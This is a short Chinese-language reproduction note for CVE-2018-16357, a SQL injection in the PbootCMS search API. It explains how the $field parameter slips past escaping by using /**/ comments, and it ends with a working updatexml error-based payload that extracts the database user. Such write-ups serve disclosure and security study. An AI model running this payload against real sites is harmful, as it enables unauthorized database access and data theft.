menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2018-16357)PbootCMS sql注入漏洞 chevron_right (CVE-2018-16357)PbootCMS sql注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2018-16357)PbootCMS sql注入漏洞.md
    1.03 KB / 2021-07-15 19:59:43
        (CVE-2018-16357)PbootCMS sql注入漏洞
    ======================================
    
    一、漏洞简介
    ------------
    
    PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。
    PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
    
    二、漏洞影响
    ------------
    
    三、复现过程
    ------------
    
        http://www.0-sec.org/api.php/Cms/search?#acode=1&num=1&order=1
    
    参数\$field是我们可以控制的,去检查函数过滤器
    
    ![](./resource/(CVE-2018-16357)PbootCMSsql注入漏洞/media/rId24.png)
    
    使用函数trim和escape字符串避免sql注入
    
    ![](./resource/(CVE-2018-16357)PbootCMSsql注入漏洞/media/rId25.png)
    
    添加a\'会导致mysql语法错误,因此函数escape\\u字符串无效
    
    ![](./resource/(CVE-2018-16357)PbootCMSsql注入漏洞/media/rId26.png)
    
    使用/\*\*/绕过
    
    ### payload:
    
        field=1)/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/user()),0x7e),1)#&keyword=title&scode=1
    
    
    links
    file_download